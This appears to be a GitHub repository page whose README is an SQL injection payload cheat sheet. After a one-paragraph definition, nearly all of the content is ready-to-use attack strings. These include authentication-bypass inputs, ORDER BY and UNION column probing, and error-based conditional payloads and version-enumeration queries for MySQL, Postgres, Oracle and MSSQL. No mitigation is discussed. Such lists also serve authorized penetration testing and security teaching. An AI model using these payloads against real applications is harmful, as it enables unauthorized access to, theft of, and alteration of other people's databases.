Skip to content
/ SQLi Public

SQL injection (SQLi) is a type of security flaw in applications that enables attackers to manipulate the database of an application.

Notifications You must be signed in to change notification settings

byfranke/SQLi

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 

Repository files navigation

SQL Injection

SQL injection (SQLi) is a type of security flaw in applications that enables attackers to manipulate the database of an application. This vulnerability can lead to unauthorized data access, deletion, or alteration, and can cause the application to behave in unintended ways. It works by deceiving the application into executing malicious SQL statements that the attacker has embedded into input fields that are poorly secured or not sanitized.

Authentication Based Payloads

or true--
") or true--
') or true--
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/

Order by and UNION Based Payloads

1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1	
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

Generic Error Based Payloads

MySQL

' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') -- -

Postgres

' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END -- -

Oracle

' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual -- -

MSSQL

' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END -- -

Database enumeration

MySQL/MSSQL

' UNION SELECT @@version -- -

Oracle

' UNION SELECT banner from v$version -- -

Oracle(2nd method)

' UNION SELECT version from v$instance -- -

Postgres

' UNION SELECT version() -- -

Number of column

MySQL/MSSQL/PGSQL

'UNION SELECT NULL,NULL,NULL -- -

ORACLE

'UNION SELECT NULL,NULL,NULL FROM DUAL -- -

MYSQL/MSSQL/PGSQL/ORACLE

' UNION ORDER BY 1 -- -

About

SQL injection (SQLi) is a type of security flaw in applications that enables attackers to manipulate the database of an application.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published